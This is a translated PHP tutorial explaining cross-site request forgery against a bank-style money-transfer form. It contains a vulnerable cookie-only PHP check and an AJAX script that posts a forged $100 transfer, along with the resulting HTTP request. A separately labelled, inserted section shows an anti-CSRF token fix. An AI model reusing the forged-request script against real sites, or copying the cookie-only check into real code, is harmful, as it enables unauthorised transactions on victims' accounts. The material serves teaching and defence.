

Cross Site Request Forgery (Cross-Site Request Forgery Explained)

Source: 自学PHP网    Date: 2015-04-17 13:03


With a CSRF attack we can send a forged request from the user's own browser, and so act on the site with the user's permissions and keep interacting with it as if the script were the user himself.
 
A good example of where CSRF applies is a bank site: after the user logs in, the site creates cookies on his computer (the role of the cookies is to save the session data).
From this moment on, any action performed from the user's browser is approved by the site. This is where AJAX comes in: with AJAX we can send a request (a packet) that is performed by the browser itself.
That means all of the user's cookies and sessions are sent along with the request (unlike a request made from a server-side language). So if the bank site has a form that is used for money transfers,
we can send a POST request to that form using AJAX and the request is approved by the site, because all of the cookies in the user's browser are sent with the AJAX request.
 
Example of a CSRF exploit
 
HTML:
 
Code:
<form action="" method="post" name="transfer">
    Amount of money to transfer:
 
    <label>
        <input type="text" name="money" id="money" />$
    </label>
    <br />
 
    For bank account:
 
    <label>
        <input type="text" name="Baccount" id="Baccount" />
    </label>
    <p>
    <label>
        <input type="submit" name="send" id="send" value="Submit" />
    </label>
    </p>
</form>

PHP:
Code:
<?php
    if (isset($_POST['send']))
    {
        if (is_numeric($_COOKIE['id']) && isset($_COOKIE['password']))
        {
            // cookies_are_valid() stands in for the site's own cookie check (placeholder name)
            if (cookies_are_valid($_COOKIE['id'], $_COOKIE['password']))
            {
                // the cookies are valid:
                // perform the transfer
            }
            else
            {
                // the cookies are invalid:
                // block the request
            }
        }
    }
?>
What is the risk here? As you can see, the PHP script only checks whether the cookies are valid and, without any further check, approves the transfer.
This means that if the cookies are present we only need to send a forged request to the system together with the user's cookies, and the system approves the transfer.
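The usual fix for the handler above is a synchronizer token: the server puts a random, per-session secret into its own form, and only accepts a transfer whose POST body echoes that secret back. A page on another origin can make the browser send the cookies, but it cannot read the token out of the bank's form, so the forged request fails. The following is an added example and not the article's code; the function names, the `$session` array (which would be `$_SESSION` after `session_start()` in a real application) and the sample data are assumptions made for this illustration.

```php
<?php
// Added example, not the original article's code: the transfer handler with a
// synchronizer (anti-CSRF) token. Function names, the $session layout and the
// sample data below are assumptions made for this illustration.

declare(strict_types=1);

// Create a per-session token once and keep it server-side.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    }
    return $session['csrf_token'];
}

// Hidden field that the genuine form embeds; a script on another origin cannot
// read it, so a forged request cannot include it.
function csrf_field(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '" />';
}

// Compare the submitted token with the stored one in constant time.
function csrf_valid(array $session, array $post): bool
{
    if (empty($session['csrf_token']) || !isset($post['csrf_token']) || !is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

// The original script approved the transfer as soon as the cookies looked valid.
// Here the browser-supplied cookies only establish who the user is; the token
// establishes that the request was produced by the site's own form.
function handle_transfer(array &$session, array $post): string
{
    if (!isset($post['send'])) {
        return 'no submission';
    }
    if (empty($session['user_id'])) {
        return 'not logged in';
    }
    if (!csrf_valid($session, $post)) {
        return 'rejected: missing or wrong CSRF token';
    }
    $money   = $post['money'] ?? '';
    $account = (string) ($post['Baccount'] ?? '');
    if (!is_numeric($money) || (float) $money <= 0 || !ctype_digit($account)) {
        return 'rejected: bad parameters';
    }
    // transfer_funds($session['user_id'], $account, (float) $money) would run here
    return sprintf('transfer of %.2f to %s accepted', (float) $money, $account);
}

// Stand-alone demonstration with a constructed session and two constructed POST bodies.
$session = ['user_id' => 42];
$forged  = ['money' => '100', 'Baccount' => '0123456789', 'send' => 'Submit'];

// The forged request from the article carries cookies but no token: rejected.
echo handle_transfer($session, $forged), PHP_EOL;

// The genuine form embeds the token; a submission that echoes it back is accepted.
echo csrf_field($session), PHP_EOL;
$genuine = $forged + ['csrf_token' => $session['csrf_token']];
echo handle_transfer($session, $genuine), PHP_EOL;
```

Running the script prints the rejection for the forged body first, then the hidden field and the acceptance for the body that carries the token. `hash_equals()` rather than `==` is deliberate: a byte-by-byte early-exit comparison would leak how many leading bytes of the token an attacker has guessed right.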
 
AJAX:
Code:
<script type="text/javascript">

var http = GetXmlHttpObject();

if (http != null)
{
    var url  = ""; // address of the form being attacked
    var pack = "money=100&Baccount=0123456789&send=Submit";

    http.open("POST", url, true);

    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.setRequestHeader("Content-length", pack.length);
    http.setRequestHeader("Connection", "close");

    http.send(pack); // send the form body built above
}

function GetXmlHttpObject()
{
    if (window.XMLHttpRequest)
    {
        return new XMLHttpRequest();
    }

    if (window.ActiveXObject)
    {
        return new ActiveXObject("Microsoft.XMLHTTP");
    }

    return null;
}

</script>
 
As already explained, AJAX requests are sent by the browser itself, so we do not have to worry about obtaining the user's cookies.
So even though we only supplied the POST body, the request that reaches the server looks something like this:
 
Code:
POST /file.php HTTP/1.1 \r\n
Host: www.2cto.com \r\n
Cookie: id=...; password=..; \r\n
Connection: Close \r\n
Content-Type: application/x-www-form-urlencoded \r\n
Content-Length: .... \r\n\r\n
money=100&Baccount=0123456789&send=Submit
Once the server returns 200 (request received successfully), $100 has been transferred from the user's account to account number 0123456789.
And that is how the CSRF attack works. Goodbye...

Excerpted from http://hi.baidu.com/evilrapper/blog/item/9bc74f36ede15c2e0a55a91e.html
